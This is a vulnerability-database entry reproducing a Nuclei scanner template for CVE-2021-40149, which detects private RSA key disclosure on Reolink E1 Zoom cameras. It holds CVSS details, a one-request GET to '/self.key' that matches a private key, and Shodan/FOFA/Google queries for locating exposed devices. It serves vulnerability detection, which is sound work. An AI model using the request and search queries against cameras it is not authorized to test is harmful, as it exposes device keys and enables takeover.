Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-40149
HistoryJun 07, 2022 - 4:54 a.m.

Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure

2022-06-0704:54:50
ProjectDiscovery
github.com
4

5.9 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

0.009 Low

EPSS

Percentile

83.2%

Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.
id: CVE-2021-40149

info:
  name: Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure
  author: For3stCo1d
  severity: medium
  description: |
    Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.
  impact: |
    An attacker can obtain the private key, potentially leading to unauthorized access and compromise of the camera.
  remediation: |
    Upgrade the Reolink E1 Zoom Camera to a version higher than 3.0.0.716 to mitigate the vulnerability.
  reference:
    - https://dl.packetstormsecurity.net/2206-exploits/reolinke1key-disclose.txt
    - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40149
    - http://packetstormsecurity.com/files/167407/Reolink-E1-Zoom-Camera-3.0.0.716-Private-Key-Disclosure.html
    - https://github.com/MrTuxracer/advisories
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 5.9
    cve-id: CVE-2021-40149
    cwe-id: CWE-552
    epss-score: 0.00942
    epss-percentile: 0.8308
    cpe: cpe:2.3:h:reolink:e1_zoom:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: reolink
    product: e1_zoom
    shodan-query: http.title:"Reolink"
    fofa-query: title="reolink"
    google-query: intitle:"reolink"
  tags: cve2021,cve,exposure,unauth,packetstorm,reolink,camera,iot

http:
  - method: GET
    path:
      - "{{BaseURL}}/self.key"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - '(?m)^-----BEGIN PRIVATE KEY-----'

      - type: word
        part: header
        words:
          - "application/json"
          - "application/html"
        condition: and
        negative: true

      - type: status
        status:
          - 200
# digest: 490a0046304402200c8db91a443e6d87655cc693a6fee9a6a10e91e35bf397e4874274c3acd4588d022042f5158f3f3350d85ca8256a12fc17a0a1d45b0ba1125e2fad28e79a90359e15:922c64590222798bb761d5b6d8e72950

5.9 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

0.009 Low

EPSS

Percentile

83.2%

Related for NUCLEI:CVE-2021-40149